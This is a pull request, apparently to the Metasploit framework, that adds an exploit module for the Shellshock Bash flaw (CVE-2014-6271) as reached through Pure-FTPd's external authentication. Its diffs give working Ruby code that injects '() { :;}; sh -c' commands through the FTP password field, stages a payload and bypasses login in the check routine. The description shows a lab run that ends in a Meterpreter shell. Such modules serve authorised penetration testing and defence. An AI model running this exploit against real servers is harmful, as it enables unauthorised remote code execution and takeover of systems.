### PR TITLE
Add CVE-2014-6271 Bash / Shellshock exploit via Pure-FTPd ext-auth

### DIFF
--- a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb
+++ b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb
@@ -43,14 +43,14 @@ class Metasploit3 < Msf::Exploit::Remote
             {
               'Platform'        => 'linux',
               'Arch'            => ARCH_X86,
-              'CmdStagerFlavor' => [ :echo, :printf ]
+              'CmdStagerFlavor' => :printf
             }
           ],
           [ 'Linux x86_64',
             {
               'Platform'        => 'linux',
               'Arch'            => ARCH_X86_64,
-              'CmdStagerFlavor' => [ :echo, :printf ]
+              'CmdStagerFlavor' => :printf
             }
           ]
         ],

--- a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb
+++ b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb
@@ -1,0 +1,111 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::Ftp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
+      'Description'     => %q(
+        This module exploits a code injection in specially crafted environment
+        variables in Bash, specifically targeting Pure-FTPd when configured to
+        use an external program for authentication.
+      ),
+      'Author'          =>
+        [
+          'Stephane Chazelas', # Vulnerability discovery
+          'Frank Denis', # Discovery of Pure-FTPd attack vector
+          'Spencer McIntyre' # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['CVE', '2014-6271'],
+          ['OSVDB', '112004'],
+          ['EDB', '34765'],
+          ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
+        ],
+      'Payload'         =>
+        {
+          'DisableNops' => true,
+          'Space'       => 2048
+        },
+      'Targets'         =>
+        [
+          [ 'Linux x86',
+            {
+              'Platform'        => 'linux',
+              'Arch'            => ARCH_X86,
+              'CmdStagerFlavor' => [ :echo, :printf ]
+            }
+          ],
+          [ 'Linux x86_64',
+            {
+              'Platform'        => 'linux',
+              'Arch'            => ARCH_X86_64,
+              'CmdStagerFlavor' => [ :echo, :printf ]
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sep 24 2014'))
+    register_options(
+      [
+        Opt::RPORT(21),
+        OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
+      ], self.class)
+    deregister_options('FTPUSER', 'FTPPASS')
+  end
+
+  def check
+    # this check method tries to use the vulnerability to bypass the login
+    username = rand_text_alphanumeric(rand(20) + 1)
+    random_id = (rand(100) + 1)
+    command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
+    if send_command(username, command) =~ /^2\d\d ok./i
+      return CheckCode::Safe if banner !~ /pure-ftpd/i
+      disconnect
+
+      command = "echo auth_ok:0; echo end"
+      if send_command(username, command) =~ /^5\d\d login authentication failed/i
+        return CheckCode::Vulnerable
+      end
+    end
+    disconnect
+
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, _opts)
+    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
+    username = rand_text_alphanumeric(rand(20) + 1)
+    send_command(username, cmd)
+  end
+
+  def exploit
+    # Cannot use generic/shell_reverse_tcp inside an elf
+    # Checking before proceeds
+    if generate_payload_exe.blank?
+      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
+    end
+
+    execute_cmdstager(linemax: 500)
+    handler
+  end
+
+  def send_command(username, cmd)
+    cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
+    connect
+    send_user(username)
+    password_result = send_pass(cmd)
+    disconnect
+    password_result
+  end
+end

--- a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb
+++ b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb
@@ -5,8 +5,8 @@
 
 require 'msf/core'
 
-class Metasploit3 < Msf::Exploit::Remote
-  Rank = GoodRanking
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Ftp
   include Msf::Exploit::CmdStager
@@ -15,9 +15,10 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'            => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
       'Description'     => %q(
-        This module exploits a code injection in specially crafted environment
-        variables in Bash, specifically targeting Pure-FTPd when configured to
-        use an external program for authentication.
+        This module exploits the code injection flaw known as shellshock which
+        leverages specially crafted environment variables in Bash. This exploit
+        specifically targets Pure-FTPd when configured to use an external
+        program for authentication.
       ),
       'Author'          =>
         [
@@ -54,6 +55,10 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ]
         ],
+      'DefaultOptions' =>
+        {
+          'PrependFork' => true
+        },
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Sep 24 2014'))
     register_options(


### PR DESCRIPTION
This module exploits the well known Bash Environment variable injection flaw in Pure-FTPd servers that execute an external program for authentication. The password field is used instead of the username field because it seems to allow longer commands to be executed.

The original Pure-FTPd PoC was posted [here](https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc).

Example output:

```
msf-git (S:0 J:0) exploit(pureftpd_bash_env_exec) > show options 

Module options (exploit/multi/ftp/pureftpd_bash_env_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.90.144   yes       The target address
   RPATH  /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT  21               yes       The target port


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST         192.168.90.144   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf-git (S:0 J:0) exploit(pureftpd_bash_env_exec) > exploit

[*] Started bind handler
[*] Connecting to FTP server 192.168.90.144:21...
[*] Connected to target FTP server.
[*] Command Stager progress -  85.74% done (499/582 bytes)
[*] Connecting to FTP server 192.168.90.144:21...
[*] Connected to target FTP server.
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 192.168.90.144
[*] Meterpreter session 14 opened (192.168.90.226:36735 -> 192.168.90.144:4444) at 2014-10-01 14:47:57 -0400
[*] Command Stager progress - 100.86% done (587/582 bytes)

meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux ubuntu 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter >
```

The check method uses the vulnerability to echo out the required information to authenticate a user.
